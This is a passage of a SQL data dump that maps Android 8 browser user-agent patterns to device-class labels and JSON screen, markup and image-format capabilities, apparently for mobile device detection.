8.*; MIX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":742,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MO-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MOVE8mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MOVE_8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MS40G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MS50G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MS50X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MS571) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MZ-16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MZ-meizu X8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Mate 20 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto G (4)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto G (5) Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto G (5)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto G (5S) Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto G (5S)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto G Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto Z (2)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto Z2 Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Moto Z3 Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MotoG3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Movic F4501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Multilaser_E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; N1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; N1-570 Space) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; N10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; N1_550_Cruiser) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; N5501L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; N5702L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; N7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; NEON_NOVA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; NEON_RAY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; NET_VOLT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; NX609J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos C5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos C7 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos_C7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos_C7A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos_C9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos_C9A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos_X9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neffos_Y7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nexus 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nexus 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nexus 5X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nexus 6P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 2 V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 2.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 3.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 3.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 5.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 7 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nokia 7.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_C070014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_C080034) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_C101014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_C101034) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_C101044) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_i4500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_i5001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Nomi_i5710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ONEPLUS A3000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ONEPLUS A3003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ONEPLUS A3010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ONEPLUS A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ONEPLUS A5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ONEPLUS A6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ONEPLUS A6003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; OWN FUN 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; OWN SMART 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":874,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; One Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; One Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; One) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Opal 4S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Optus X Start) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Orange Dive 73) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Orange Mahpee) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Orange Rise 54) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 